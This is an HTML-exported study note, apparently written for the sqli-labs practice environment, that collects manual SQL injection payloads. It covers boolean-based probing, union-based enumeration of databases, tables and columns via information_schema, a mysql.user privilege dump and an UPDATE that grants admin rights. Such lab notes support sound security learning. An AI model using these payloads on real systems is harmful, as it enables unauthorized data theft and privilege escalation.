<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>Manual SQL</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Manual SQL</h1>

      <div class="ck-content">
        <p>This id parameter is attached to a certain username (login name) and password
          which are being chosen from the database.
          <br />This how it would look in terms of SQL language:</p>
        <p><code>select login_name, password from table where id= </code>

        </p>
        <figure class="image image_resized" style="width:59.83%">
          <img src="Manual%20SQL/image.png" />
        </figure>
         <h2>Update DB</h2><pre><code class="language-text-plain">update user set is_admin=1 where lower_name="admin1";</code></pre>

        <p>to modify a value of column <code>is_admin</code> to 1 in the table <code>user</code>,
          and use <code>where</code> to specify it to modify only one field.</p>
        <p> </p>
         <h2>Boolean based</h2>

        <p>Now, fix the query by putting <code>--+</code>

        </p>
        <p>At this point, it is important to understand that in SQL language we can
          actually use =, &lt;, &gt; to compare the values. </p>
        <p>Try putting different comparison values in your link</p>
        <p><code>10.10.77.93/sqli-labs/Less-8/?id=1' OR 1 &lt; 2 --+</code> = True</p>
        <p>or <code>10.10.77.93/sqli-labs/Less-8/?id=1' OR 1 &gt; 2 --+</code> = False</p>
        <p><code>id=1' AND (ascii(substr((select database()),1,1))) = 115 --+</code> </p>
         <h2>Union-based SQLi</h2>

        <p>union-based SQLi is a SQL injection technique that leverages the UNION
          SQL operator to combine the results of two or more SELECT statements into
          a single result which is then returned as part of the HTTP response.</p>
        <p>The UNION keyword lets you execute one or more additional SELECT queries
          and append the results to the original query. For example:</p>
        <p>determine the number of columns you can retrieve.</p>
        <p><code>SELECT 1, 2 FROM usernames UNION SELECT 1, 2 FROM passwords</code>

        </p>
        <p>
          <img src="Manual%20SQL/1_image.png" />
          <img src="Manual%20SQL/2_image.png" />
        </p>
        <p>Finally, we can start getting some valuable information. Simply replace
          some null values with SQL keywords to get information about the database. 
          <br
          />Here's a small list of thing you'd want to retrieve:</p>
        <p>1. database()</p>
        <p>2. user()</p>
        <p>3. @@version</p>
        <p>4. username</p>
        <p>5. password</p>
        <p>6. table_name</p>
        <p>7. column_name</p>
         <h2>FIle write</h2>

        <p><code>" union all select 1,2,3,group_concat(user,0x3a,file_priv) from mysql.user -- -</code>

        </p>
        <p>adjust the number of columns</p>
         <h2>Methodology for manual SQLI:</h2>

        <p><a href="https://perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/">https://perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/</a> </p>
        <p>retrieve database name:</p><pre><code class="language-text-plain">1 UNION ALL SELECT NULL,concat(schema_name) FROM information_schema.schemata --</code></pre>

        <p>Retrieve table names::</p><pre><code class="language-text-plain">' UNION SELECT NULL,concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema="webapp" '</code></pre>

        <p>Retrieve column names:</p><pre><code class="language-text-plain">' UNION SELECT NULL,concat(column_name) FROM information_schema.COLUMNS WHERE TABLE_NAME="queue" '</code></pre>

        <p> </p>
      </div>
    </div>
  </body>

</html>